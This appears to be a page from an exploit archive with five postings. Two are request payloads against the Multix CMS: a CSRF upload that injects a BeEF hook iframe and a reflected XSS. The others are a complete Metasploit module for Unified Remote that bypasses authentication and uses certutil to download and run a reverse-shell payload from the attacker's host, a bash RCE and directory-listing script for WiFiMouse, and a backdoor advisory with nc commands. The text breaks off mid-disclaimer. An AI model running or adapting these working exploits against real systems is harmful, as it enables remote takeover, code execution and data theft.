<pre><code># Exploit Title: Multix - Multipurpose Website CMS with Codeigniter Cross Site Request Forgery<br /># Exploit Author: th3d1gger<br /># Vendor Homepage: https://codecanyon.net<br /># Software Link: https://codecanyon.net/item/multix-multipurpose-website-cms-with-codeigniter/23537596<br /># Version: Version 2.4<br /># Tested on Ubuntu 18.04<br /><br /><br />-------Request-----------<br />POST /admin/file/add HTTP/1.1<br />Host: localhost<br />Content-Length: 466<br />Cache-Control: max-age=0<br />sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"<br />Origin: http://localhost<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryE0mBtYGic6umB5Ve<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Linux"<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/admin/file/add<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: allow=1;<br />Connection: close<br /><br />------WebKitFormBoundaryE0mBtYGic6umB5Ve<br />Content-Disposition: form-data; name="file_title"<br /><br /><iframe src="http://local.proxy:3000/?url=http://localhost/beefhook.html"></iframe><br />------WebKitFormBoundaryE0mBtYGic6umB5Ve<br />Content-Disposition: form-data; name="file_name"; filename="shell2.php .jpg"<br />Content-Type: image<br /><br />asdasd<br />------WebKitFormBoundaryE0mBtYGic6umB5Ve<br />Content-Disposition: form-data; name="form1"<br /><br /><br />------WebKitFormBoundaryE0mBtYGic6umB5Ve--<br /></code></pre>
<pre><code># Exploit Title: Multix - Multipurpose Website CMS with Codeigniter Reflected Cross Site Scripting<br /># Exploit Author: th3d1gger<br /># Vendor Homepage: https://codecanyon.net<br /># Software Link: https://codecanyon.net/item/multix-multipurpose-website-cms-with-codeigniter/23537596<br /># Version: Version 2.4<br /># Tested on Ubuntu 18.04<br /><br /><br />-------Request-----------<br />POST /search HTTP/1.1<br />Host: localhost<br />Content-Length: 24<br />Cache-Control: max-age=0<br />sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"<br />Origin: http://localhost<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36<br />Content-Type: application/x-www-form-urlencoded<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Linux"<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/search<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: allow=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IlRwa1o2cDhxRGtqTUxKL2tLS0NiVGc9PSIsInZhbHVlIjoiajVqT2VOeTk5RmVXY20yaG44ekFQbTc4OFZ3K2EvbThhTFFVUjBzdVpZNmtDQVlocndZU1pEeWFlaURPWDl3V2JsZGFxeDYyR1NWRGoyVHRDYW9iVExUck12NTNjVHZ3VWF2eHNWN1dScXNRdW81ZUNPeldnZ2FRdHVxODlsWnI1cDhWOEcvQlZWSi83VEM5WTJNNC9CME5PWVVyU2dDNWhNcUlvSXU1UWlsQjF2eTYxdmQ2aW5EZHNkYVBQMUpObEN2aFp6Y0tvUkhrUkFac0ZveURZZ0NFMHlPWjRYYSs0eTNTR3VPVXZUMD0iLCJtYWMiOiJjYmU1ZWYxODJlZjYyNzAyODI5YjM4NWEzMDgyYWFkMzA2YmIzOWM3ODA3ZjgyNjMzZWRjMDc3MDkxNWEzZGQ3In0%3D; ci_session=b3568d851b75f1b0191447e7b8ba35860e8c8e56; twk_idm_key=-J__vZrlSOiy2FYLE4Fsu; TawkConnectionTime=0; twk_uuid_5a7c31ded7591465c7077c48=%7B%22uuid%22%3A%221.AGEpC4jGGoH2T6v2QAlePuWJRFfI9oZIu0RUbaNluAgJJzDJQ1zFcS1Fv9uH7mP6PIgcXCE6JVCXLF7JZsX0kHOsQNihqwO81D79ESmlYkVwYf5UHnjWKkJkiJPYK7Dn%22%2C%22version%22%3A3%2C%22domain%22%3Anull%2C%22ts%22%3A1663795200266%7D<br />Connection: close<br /><br />search_string=<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>&form1=<br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = NormalRanking<br /><br /> include Exploit::Remote::Tcp<br /> # attempted cmdstger, however there was so much sleep involved for the screen to clear the buffer<br /> # that it was going to take hours. The buffer would also overrun itself and the exploit would fail<br /> # if not enough sleep time was used. it was a nightmare, not for this exploit.<br /> # include Msf::Exploit::CmdStager<br /> include Exploit::EXE # generate_payload_exe<br /> include Msf::Exploit::Remote::HttpServer::HTML<br /> include Msf::Exploit::FileDropper<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Unified Remote Auth Bypass to RCE',<br /> 'Description' => %q{<br /> This module utilizes the Unified Remote remote control protocol to type out and<br /> deploy a payload. The remote control protocol can be configured to have no passwords,<br /> a group password, or individual user accounts. If the web page is accessible, the<br /> access control is set to no password for exploitation, then reverted.<br /> If the web page is not accessible, exploitation will be tried blindly.<br /> This module has been successfully tested against version 3.11.0.2483 (50) on Windows 10.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die', # msf module<br /> 'H4RK3NZ0' # edb<br /> ],<br /> 'References' => [<br /> [ 'EDB', '49587' ],<br /> [ 'URL', 'https://www.unifiedremote.com/' ],<br /> [ 'URL', 'https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/unified%20remote/unified-remote-rce.py' ],<br /> [ 'CVE', '2022-3229' ]<br /> ],<br /> 'Arch' => [ ARCH_X64, ARCH_X86 ],<br /> 'Platform' => 'win',<br /> 'Stance' => Msf::Exploit::Stance::Aggressive,<br /> 'Targets' => [<br /> ['pull', {}],<br /> ],<br /> 'Payload' => {<br /> 'BadChars' => "\x0a\x00"<br /> },<br /> 'DefaultOptions' => {<br /> # since this may get typed out ON SCREEN we want as small a payload as possible<br /> 'PAYLOAD' => 'windows/shell/reverse_tcp'<br /> },<br /> 'DisclosureDate' => '2021-02-25',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [CRASH_SERVICE_DOWN],<br /> 'SideEffects' => [SCREEN_EFFECTS, ARTIFACTS_ON_DISK] # typing on screen<br /> }<br /> )<br /> )<br /> register_options(<br /> [<br /> OptPort.new('RPORT', [true, 'Port Unified Remote runs on', 9512]),<br /> OptPort.new('WEBSERVER', [true, 'Port Unified Remote web server runs on', 9510]),<br /> OptInt.new('SLEEP', [true, 'How long to sleep between commands', 1]),<br /> OptString.new('PATH', [true, 'Where to stage payload for pull method', 'c:\\Windows\\Temp\\']),<br /> OptString.new('CLIENTNAME', [false, 'Name of client, this shows up in the logs', '']),<br /> OptBool.new('VISIBLE', [false, 'Make exploitation visible to the user', false]),<br /> ]<br /> )<br /> end<br /><br /> def win_key<br /> 'LWIN' # 4c57494e<br /> end<br /><br /> def ret_key<br /> 'RETURN' # 52455455524e<br /> end<br /><br /> def space_key<br /> 'SPACE' # 5350414345<br /> end<br /><br /> def path<br /> return datastore['PATH'] if datastore['PATH'].end_with? '\\'<br /><br /> "#{datastore['PATH']}\\"<br /> end<br /><br /> def initialize_packet<br /> initialize_packet = "\x00\x00\x00\x85\x00\x01\x08"<br /> initialize_packet << "Action\x00" # 416374696f6e 00<br /> initialize_packet << "\x00\x05"<br /> initialize_packet << "Password\x00" # 50617373776f7264 00<br /> initialize_packet << '8e8133b3-a18b-43af-a7cd-e04f747827ce' # 38653831333362332d613138622d343361662d613763642d653034663734373832376365 seems to be a default<br /> initialize_packet << "\x00\x05"<br /> initialize_packet << "Platform\x00" # 506c6174666f726d 00<br /> initialize_packet << "android\x00" # 616e64726f6964 00<br /> initialize_packet << "\x08"<br /> initialize_packet << "Request\x00" # 52657175657374 00<br /> initialize_packet << "\x00\x05"<br /> initialize_packet << "Source\x00" # 536f7572636500<br /> # this line shows up in logs as who connected<br /> initialize_packet << "#{@client_name}\x00" # 616e64726f69642d64373038653134653532383463623831 00<br /> initialize_packet << "\x03"<br /> initialize_packet << "Version\x00" # 56657273696f6e 00<br /> initialize_packet << "\x00\x00\x00\x0a\x00"<br /> end<br /><br /> def empty_authentication<br /> empty_authentication = "\x00\x00\x00\xc8\x00\x01\x08"<br /> empty_authentication << "Action\x00" # 416374696f6e 00<br /> empty_authentication << "\x01\x02"<br /> empty_authentication << "Capabilities\x00" # 4361706162696c6974696573 00<br /> empty_authentication << "\x04"<br /> empty_authentication << "Actions\x00" # 416374696f6e73 00<br /> empty_authentication << "\x01\x04"<br /> empty_authentication << "Encryption2\x00" # 456e6372797074696f6e32 00<br /> empty_authentication << "\x01\x04"<br /> empty_authentication << "Fast\x00" # 46617374 00<br /> empty_authentication << "\x00\x04"<br /> empty_authentication << "Grid\x00" # 47726964 00<br /> empty_authentication << "\x01\x04"<br /> empty_authentication << "Loading\x00" # 4c6f6164696e6700<br /> empty_authentication << "\x01\x04"<br /> empty_authentication << "Sync\x00" # 53796e6300<br /> empty_authentication << "\x01\x00\x05"<br /> empty_authentication << "Password\x00" # 50617373776f7264 00<br /> empty_authentication << 'd634c1dcfdeb8735608a4a104ded4076de766dd61443619809ad7f35858d4492' # 64363334633164636664656238373335363038613461313034646564343037366465373636646436313434333631393830396164376633353835386434343932 seems to be a default<br /> empty_authentication << "\x00\x08"<br /> empty_authentication << "Request\x00" # 52657175657374 00<br /> empty_authentication << "\x01\x05"<br /> empty_authentication << "Source\x00" # 536f7572636500<br /> # this line shows up in logs as who connected<br /> empty_authentication << "#{@client_name}\x00" # 616e64726f69642d64373038653134653532383463623831 00<br /> empty_authentication << "\x00"<br /> end<br /><br /> #############################################<br /> # These methods/packets are for visible mode<br /> #############################################<br /><br /> def string_header_one(length)<br /> # 2 null, then message length takes next 2 spots<br /> string_header_one = "\x00\x00"<br /> string_header_one << [length].pack('n').to_s<br /> end<br /><br /> def string_header_two<br /> string_header_two = "\x00\x01\x08"<br /> string_header_two << "Action\x00" # 416374696f6e 00<br /> string_header_two << "\x07\x05"<br /> string_header_two << "ID\x00" # 4944 00<br /> string_header_two << "Relmtech.Keyboard\x00" # 52656c6d746563682e4b6579626f617264 00<br /> string_header_two << "\x02"<br /> string_header_two << "Layout\x00" # 4c61796f7574 00<br /> string_header_two << "\x06"<br /> string_header_two << "Controls\x00" # 436f6e74726f6c73 00<br /> string_header_two << "\x02\x00\x02"<br /> string_header_two << "OnAction\x00" # 4f6e416374696f6e 00<br /> string_header_two << "\x02"<br /> string_header_two << "Extras\x00" # 457874726173 00<br /> string_header_two << "\x06"<br /> string_header_two << "Values\x00" # 56616c756573 00<br /> string_header_two << "\x02\x00\x05"<br /> string_header_two << "Value\x00" # 56616c7565 00<br /> end<br /><br /> def string_footer<br /> string_footer = "\x00\x00\x00\x00\x05"<br /> string_footer << "Name\x00" # 4e616d65 00<br /> string_footer << "toggle\x00" # 746f67676c65 00<br /> string_footer << "\x00\x05"<br /> string_footer << "Source\x00" # 536f75726365 00<br /> # this line shows up in logs as who connected<br /> string_footer << "#{@client_name}\x00" # 616e64726f69642d64373038653134653532383463623831 00<br /> string_footer << "\x00"<br /> end<br /><br /> def send_key(key, press_return: false)<br /> if key == ' '<br /> key = space_key<br /> end<br /> contents = "#{string_header_two}#{key}#{string_header_three}#{key}#{string_footer}"<br /> contents = "#{string_header_one(contents.length)}#{contents}"<br /> sock.put(contents)<br /> if press_return<br /> contents = "#{string_header_two}#{ret_key}#{string_header_three}#{ret_key}#{string_footer}"<br /> contents = "#{string_header_one(contents.length)}#{contents}"<br /> sock.put(contents)<br /> end<br /> end<br /><br /> ##############################################<br /> # These methods/packets are for invisible mode<br /> ##############################################<br /><br /> def load_unified_command<br /> # header: 00 00 00 5e<br /> wait = "\x00\x01\x08"<br /> wait << "Action\x00" # 416374696f6e 00<br /> wait << "\x03\x05" # changed from the previous one from 07 to 03<br /> wait << "ID\x00" # 4944 00<br /> wait << "Unified.Command\x00" # 556e69666965642e436f6d6d616e64 00<br /> wait << "\x02"<br /> wait << "Layout\x00" # 4c61796f7574 00<br /> wait << "\x03"<br /> wait << "Hash\x00" # 48617368 00<br /> wait << "\x9e\xd0\x99:\x00" # 9ed0993a 00<br /> wait << "\x08"<br /> wait << "Request\x00" # 52657175657374 00<br /> wait << "\x03\x05" # changed from the previous one from 07 to 03<br /> wait << "Source\x00" # 536f7572636500<br /> wait << "#{@client_name}\x00"<br /> wait << "\x00"<br /> end<br /><br /> def create_script<br /> # header: 00 00 00 e2<br /> new_onee = "\x00\x01\x08"<br /> new_onee << "Action\x00" # 416374696f6e 00<br /> new_onee << "\x07\x05"<br /> new_onee << "ID\x00" # 4944 00<br /> new_onee << "Unified.Command\x00" # 556e69666965642e436f6d6d616e64 00<br /> new_onee << "\x02"<br /> new_onee << "Layout\x00" # 4c61796f7574 00<br /> new_onee << "\x06"<br /> new_onee << "Controls\x00" # 436f6e74726f6c73 00<br /> new_onee << "\x02\x00\x02"<br /> new_onee << "OnAction\x00" # 4f6e416374696f6e 00<br /> new_onee << "\x02"<br /> new_onee << "Extras\x00" # 457874726173 00<br /> new_onee << "\x06"<br /> new_onee << "Values\x00" # 56616c756573 00<br /> new_onee << "\x02\x00\x05"<br /> new_onee << "Key\x00" # 4b6579 00<br /> new_onee << "Text\x00" # 54657874 00<br /> new_onee << "\x05"<br /> new_onee << "Value\x00" # 56616c7565 00<br /> new_onee << "\x00\x00\x00\x00\x05"<br /> new_onee << "Name\x00" # 4e616d65 00<br /> new_onee << "update\x00" # 757064617465 00<br /> new_onee << "\x00\x08"<br /> new_onee << "Type\x00" # 54797065 00<br /> new_onee << "\x08\x00\x00\x00\x08"<br /> new_onee << "Request\x00" # 52657175657374 00<br /> new_onee << "\x07\x02"<br /> new_onee << "Run\x00" # 52756e 00<br /> new_onee << "\x02"<br /> new_onee << "Extras\x00" # 457874726173 00<br /> new_onee << "\x06"<br /> new_onee << "Values\x00" # 56616c756573 00<br /> new_onee << "\x02\x00\x05"<br /> new_onee << "Key\x00" # 4b6579 00<br /> new_onee << "Text\x00" # 54657874 00<br /> new_onee << "\x05"<br /> new_onee << "Value\x00" # 56616c7565 00<br /> new_onee << "\x00\x00\x00\x00\x05"<br /> new_onee << "Name\x00" # 4e616d65 00<br /> new_onee << "update\x00" # 757064617465 00<br /> new_onee << "\x00\x05"<br /> new_onee << "Source\x00" # 536f75726365 00<br /> new_onee << "#{@client_name}\x00"<br /> new_onee << "\x00"<br /> end<br /><br /> def initialize_keyboard<br /> # header 00 00 00 4b<br /> new_twoo = "\x00\x01\x08"<br /> new_twoo << "Action\x00" # 416374696f6e 00<br /> new_twoo << "\x05\x05"<br /> new_twoo << "ID\x00" # 4944 00<br /> new_twoo << "Unified.Command\x00" # 556e69666965642e436f6d6d616e64 00<br /> new_twoo << "\x08"<br /> new_twoo << "Request\x00" # 52657175657374 00<br /> new_twoo << "\x05\x05"<br /> new_twoo << "Source\x00" # 536f75726365 00<br /> new_twoo << "#{@client_name}\x00"<br /> new_twoo << "\x00"<br /> end<br /><br /> def add_content(command)<br /> # header is dymanic based on length of command<br /> new_threee = "\x00\x01\x08"<br /> new_threee << "Action\x00" # 416374696f6e 00<br /> new_threee << "\x07\x05"<br /> new_threee << "ID\x00" # 4944 00<br /> new_threee << "Unified.Command\x00" # 556e69666965642e436f6d6d616e64 00<br /> new_threee << "\x02"<br /> new_threee << "Layout\x00" # 4c61796f7574 00<br /> new_threee << "\x06"<br /> new_threee << "Controls\x00" # 436f6e74726f6c73 00<br /> new_threee << "\x02\x00\x02"<br /> new_threee << "OnAction\x00" # 4f6e416374696f6e 00<br /> new_threee << "\x02"<br /> new_threee << "Extras\x00" # 457874726173 00<br /> new_threee << "\x06"<br /> new_threee << "Values\x00" # 56616c756573 00<br /> new_threee << "\x02\x00\x05"<br /> new_threee << "Key\x00" # 4b6579 00<br /> new_threee << "Text\x00" # 54657874 00<br /> new_threee << "\x05"<br /> new_threee << "Value\x00" # 56616c7565 00<br /> new_threee << command<br /> new_threee << "\x00\x00\x00\x00\x05"<br /> new_threee << "Name\x00" # 4e616d65 00<br /> new_threee << "update\x00" # 757064617465 00<br /> new_threee << "\x00\x08"<br /> new_threee << "Type\x00" # 54797065 00<br /> new_threee << "\x08\x00\x00\x00\x08"<br /> new_threee << "Request\x00" # 52657175657374 00<br /> new_threee << "\x07\x02"<br /> new_threee << "Run\x00" # 52756e 00<br /> new_threee << "\x02"<br /> new_threee << "Extras\x00" # 457874726173 00<br /> new_threee << "\x06"<br /> new_threee << "Values\x00" # 56616c756573 00<br /> new_threee << "\x02\x00\x05"<br /> new_threee << "Key\x00" # 4b6579 00<br /> new_threee << "Text\x00" # 54657874 00<br /> new_threee << "\x05"<br /> new_threee << "Value\x00" # 56616c7565 00<br /> new_threee << command<br /> new_threee << "\x00\x00\x00\x00\x05"<br /> new_threee << "Name\x00" # 4e616d65 00<br /> new_threee << "update\x00" # 757064617465 00<br /> new_threee << "\x00\x05"<br /> new_threee << "Source\x00" # 536f75726365 00<br /> new_threee << "#{@client_name}\x00"<br /> new_threee << "\x00"<br /> end<br /><br /> def execute_script<br /> # header 00 00 00 96<br /> new_fourr = "\x00\x01\x08"<br /> new_fourr << "Action\x00" # 416374696f6e 00<br /> new_fourr << "\x07\x05"<br /> new_fourr << "ID\x00" # 4944 00<br /> new_fourr << "Unified.Command\x00" # 556e69666965642e436f6d6d616e64 00<br /> new_fourr << "\x02"<br /> new_fourr << "Layout\x00" # 4c61796f7574 00<br /> new_fourr << "\x06"<br /> new_fourr << "Controls\x00" # 436f6e74726f6c73 00<br /> new_fourr << "\x02\x00\x02"<br /> new_fourr << "OnAction\x00" # 4f6e416374696f6e 00<br /> new_fourr << "\x05"<br /> new_fourr << "Name\x00" # 4e616d65 00<br /> new_fourr << "execute\x00" # 65786563757465 00<br /> new_fourr << "\x00\x08"<br /> new_fourr << "Type\x00" # 54797065 00<br /> new_fourr << "\x08\x00\x00\x00\x08"<br /> new_fourr << "Request\x00" # 52657175657374 00<br /> new_fourr << "\x07\x02"<br /> new_fourr << "Run\x00" # 52756e 00<br /> new_fourr << "\x05"<br /> new_fourr << "Name\x00" # 4e616d65 00<br /> new_fourr << "execute\x00" # 65786563757465 00<br /> new_fourr << "\x00\x05"<br /> new_fourr << "Source\x00" # 536f75726365 00<br /> new_fourr << "#{@client_name}\x00"<br /> new_fourr << "\x00"<br /> end<br /><br /> def string_header_three<br /> string_header_three = "\x00\x00\x00\x00\x05"<br /> string_header_three << "Name\x00" # 4e616d65 00<br /> string_header_three << "toggle\x00" # 746f67676c65 00<br /> string_header_three << "\x00\x08"<br /> string_header_three << "Type\x00" # 54797065 00<br /> string_header_three << "\x08\x00\x00\x00\x08"<br /> string_header_three << "Request\x00" # 52657175657374 00<br /> string_header_three << "\x07\x02"<br /> string_header_three << "Run\x00" # 52756e 00<br /> string_header_three << "\x02"<br /> string_header_three << "Extras\x00" # 457874726173 00<br /> string_header_three << "\x06"<br /> string_header_three << "Values\x00" # 56616c756573 00<br /> string_header_three << "\x02\x00\x05"<br /> string_header_three << "Value\x00" # 56616c7565 00<br /> end<br /><br /> def on_request_uri(cli, _req)<br /> p = generate_payload_exe<br /> send_response(cli, p)<br /> print_good("Payload request received, sending #{p.length} bytes of payload for staging")<br /> end<br /><br /> def restart_server<br /> http_sock = connect(false, { 'RPORT' => datastore['WEBSERVER'].to_i })<br /> # http client overrides sock, so we had to pick one... long live sock<br /> request = "GET /system/restart HTTP/1.1\r\n"<br /> request << "Host: #{datastore['RHOST']}:#{datastore['WEBSERVER']}\r\n"<br /> request << "\r\n"<br /><br /> http_sock.put(request)<br /> disconnect<br /> print_status('Sleeping 5 seconds for server to restart')<br /> sleep(5)<br /> end<br /><br /> def set_config(config)<br /> print_status('Uploading new server config')<br /> http_sock = connect(false, { 'RPORT' => datastore['WEBSERVER'].to_i })<br /> # http client overrides sock, so we had to pick one... long live sock<br /> request = "POST /system/config HTTP/1.1\r\n"<br /> request << "Host: #{datastore['RHOST']}:#{datastore['WEBSERVER']}\r\n"<br /> request << "Accept: application/json, text/javascript, */*; q=0.01\r\n"<br /> request << "Content-Type: application/json\r\n"<br /> request << "X-Requested-With: XMLHttpRequest\r\n"<br /> request << "Content-Length: #{config.to_json.length}\r\n"<br /> request << "\r\n"<br /> request << config.to_json<br /><br /> http_sock.put(request)<br /> begin<br /> http_sock.get_once(-1)<br /> rescue EOFError<br /> return nil<br /> end<br /><br /> disconnect<br /> restart_server<br /> end<br /><br /> def get_config<br /> print_status('Retrieving server config')<br /> http_sock = connect(false, { 'RPORT' => datastore['WEBSERVER'].to_i })<br /> # http client overrides sock, so we had to pick one... long live sock<br /> request = "GET /system/config HTTP/1.1\r\n"<br /> request << "Host: #{datastore['RHOST']}:#{datastore['WEBSERVER']}\r\n"<br /> request << "\r\n"<br /><br /> http_sock.put(request)<br /> begin<br /> res = http_sock.get_once(-1)<br /> rescue EOFError<br /> return nil<br /> end<br /> disconnect<br /> body = res.split("\r\n\r\n")[1]<br /> if body.include?('<h1>Forbidden (403)</h1>')<br /> print_error('Web interface is disabled. Unable to attempt bypass, assuming no authentication.')<br /> return nil<br /> else<br /> # transient error where the JSON doesn't fully receive maybe 1/15 tries in my testing<br /> begin<br /> return JSON.parse(body) # split between headers and body<br /> rescue JSON::ParserError<br /> return nil<br /> end<br /> end<br /> end<br /><br /> def report_cred(opts)<br /> service_data = {<br /> address: opts[:ip],<br /> port: opts[:port],<br /> service_name: opts[:service_name],<br /> protocol: 'tcp',<br /> workspace_id: myworkspace_id<br /> }<br /><br /> credential_data = {<br /> origin_type: :service,<br /> module_fullname: fullname,<br /> username: opts[:user],<br /> private_data: opts[:password],<br /> private_type: :password<br /> }.merge(service_data)<br /><br /> login_data = {<br /> core: create_credential(credential_data),<br /> status: Metasploit::Model::Login::Status::SUCCESSFUL,<br /> last_attempted_at: DateTime.now,<br /> proof: opts[:proof]<br /> }.merge(service_data)<br /><br /> create_credential_login(login_data)<br /> end<br /><br /> def check<br /> security_mode = get_config<br /> if security_mode.nil?<br /> return CheckCode::Unknown('Unable to get config from web server, unknown status of Unified Remote Controller')<br /> end<br /><br /> CheckCode::Vulnerable("Unified Remote is vulnerable on port #{security_mode['interfaces']['tcp']['port']} with security mode '#{security_mode['security']['mode']}' (can be bypassed, if needed)")<br /> end<br /><br /> def exploit<br /> if datastore['CLIENTNAME'].blank?<br /> @client_name = "android-#{Rex::Text.rand_text_alphanumeric(16)}"<br /> print_status("Client name set to: #{@client_name}")<br /> else<br /> @client_name = datastore['CLIENTNAME']<br /> end<br /> # first grab the config from the HTTP server to determine if we need to disable auth<br /> security_mode = get_config<br /> reset_security_mode = nil<br /> unless security_mode.nil?<br /> if security_mode['security']['mode'] == 'none'<br /> print_good('No security enabled')<br /> else<br /> print_status("#{security_mode['security']['mode']} mode enabled, password required, bypassing")<br /> reset_security_mode = security_mode['security']['mode']<br /> security_mode['security']['mode'] = 'none'<br /> set_config(security_mode)<br /> end<br /> # now that we have the config, check if theres any users, no passwords (theyre GUIDs)<br /> security_mode['security']['users'].each do |account|<br /> print_good("Found account: #{account['username']}")<br /> report_cred(<br /> ip: rhost,<br /> port: rport,<br /> service_name: 'wifi mouse',<br /> user: account['username'],<br /> password: '',<br /> proof: account<br /> )<br /> end<br /> end<br /><br /> # start actually exploiting the rdp-ish server<br /> connect<br /> print_status('Sending handshake')<br /> sock.put(initialize_packet)<br /> sleep(datastore['SLEEP'])<br /> print_status('Sending empty authentication')<br /> sock.put(empty_authentication)<br /> sleep(datastore['SLEEP'])<br /><br /> filename = Rex::Text.rand_text_alphanumeric(rand(8..17)) + '.exe'<br /> register_file_for_cleanup("#{path}#{filename}")<br /> # this method was in the original edb exploit, this is significantly faster<br /> # and speed is of the essence since remote user input most likely breaks this module<br /> stager = "certutil.exe -urlcache -f http://#{datastore['lhost']}:#{datastore['SRVPORT']}/ #{path}#{filename}"<br /> start_service('Path' => '/') # start webserver<br /><br /> if datastore['VISIBLE']<br /> print_status('Opening Start Menu')<br /> # original exploit sent it twice, so we follow that<br /> send_key(win_key)<br /> send_key(win_key)<br /> sleep(datastore['SLEEP'])<br /><br /> print_status('Opening command prompt')<br /> 'cmd.exe'.each_char do |letter|<br /> send_key(letter)<br /> end<br /> send_key(ret_key)<br /> sleep(datastore['SLEEP'])<br /><br /> print_status('Typing out payload')<br /> stager.each_char do |letter|<br /> send_key(letter)<br /> end<br /> send_key(ret_key)<br /> sleep(datastore['SLEEP'] * 2) # give time for it to save<br /><br /> print_status('Attempting to open payload')<br /> "#{path}#{filename} && exit".each_char do |letter|<br /> send_key(letter)<br /> end<br /> send_key(ret_key)<br /> else<br /> stager << " && #{path}#{filename} && exit"<br /> print_status('Loading Unified.Command')<br /> contents = load_unified_command<br /> sock.put("#{string_header_one(contents.length)}#{contents}")<br /> sleep(datastore['SLEEP'])<br /><br /> print_status('Updating Unified.Command')<br /> contents = create_script<br /> sock.put("#{string_header_one(contents.length)}#{contents}")<br /> sleep(datastore['SLEEP'])<br /><br /> contents = initialize_keyboard<br /> sock.put("#{string_header_one(contents.length)}#{contents}")<br /> sleep(datastore['SLEEP'])<br /><br /> print_status('Sending payload')<br /> contents = add_content(stager)<br /> sock.put("#{string_header_one(contents.length)}#{contents}")<br /> sleep(datastore['SLEEP'])<br /><br /> print_status('Executing script')<br /> contents = execute_script<br /> sock.put("#{string_header_one(contents.length)}#{contents}")<br /> sleep(datastore['SLEEP'])<br /><br /> contents = create_script<br /> sock.put("#{string_header_one(contents.length)}#{contents}")<br /> sleep(datastore['SLEEP'])<br /> end<br /><br /> handler<br /> disconnect<br /> sleep(datastore['SLEEP'] * 2) # give time for it to do its thing before we revert<br /><br /> # lastly some cleanup<br /> unless reset_security_mode.nil?<br /> print_status('Reverting security mode')<br /> security_mode['security']['mode'] = reset_security_mode<br /> set_config(security_mode)<br /> end<br /> end<br />end<br /></code></pre>
<pre><code># Exploit Title: WiFiMouse 1.8.3.4 - Remote Code Execution (RCE)<br /># Date: 15-08-2022<br /># Author: Febin<br /># Vendor Homepage: http://necta.us/<br /># Software Link: http://wifimouse.necta.us/#download<br /># Version: 1.8.3.4<br /># Tested on: Windows 10<br /><br />#!/bin/bash<br />printf "<br /> WiFiMouse / MouseServer 1.8.3.4 Exploit<br /> <br /> by FEBIN<br /><br />"<br /><br />printf "[*] Enter the Target IP Address: "<br />read TARGET<br /><br /><br /><br />rce(){<br />printf "[*] Enter the Command to execute on the Target: "<br />read CMD<br /><br />sh -c "echo 'key 9[R] WIN d';sleep 1;echo 'key 9[R] WIN u';sleep 1;echo 'utf8 cmd /c $CMD';sleep 1;echo 'key 9[R] RTN u'" | socat - TCP4:$TARGET:1978<br />}<br /><br />dirlist(){<br /><br />echo "[*] User's Home Directory Contents:"<br /><br />echo 'fileexplorer ~/' | nc $TARGET 1978 | strings | cut -b 2-<br /><br />while $true<br />do<br />printf "\nList Directory:> "<br />read DIR<br />echo "[+] Contents of $DIR: "<br />echo "fileexplorer ~/$DIR" | nc $TARGET 1978 | strings | cut -b 2-<br />done<br /><br /><br />}<br /><br />printf "<br /> [1] Remote Command Execution<br /> [2] Directory Listing<br /> <br /> "<br />printf "Enter Your Choice (1 or 2) : "<br />read CHOICE<br /><br />if [[ $CHOICE == "1" ]]<br />then<br />rce<br />elif [[ $CHOICE == "2" ]]<br />then<br />dirlist<br /><br />else<br />echo "[-] Invalid Choice!"<br />fi<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/2cbd0fcf4d5fd5fb6c8014390efb0b21.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Hellza.120<br />Vulnerability: Unauthorized Remote Command Execution<br />Description: The malware listens on TCP ports 12122, 21. Third-party adversarys who can reach infected systems can issue commands made available by the backdoor.<br />Family: Hellza<br />Type: PE32<br />MD5: 2cbd0fcf4d5fd5fb6c8014390efb0b21<br />Vuln ID: MVID-2022-0641<br />Dropped files: msdllsrv.exe<br />Disclosure: 09/19/2022 <br /><br />Exploit/PoC:<br />C:\>nc64.exe x.x.x.x 12122<br />xrR_Server version:1.20 Beta R1.1<br /><br />F (starts FTP if not running in case where the server was restarted)<br /><br />L (logger)<br />L15_ *0.00 KB*<br /><br />D (drives)<br />D 1C:\2D:\<br /><br />E (run file)<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any 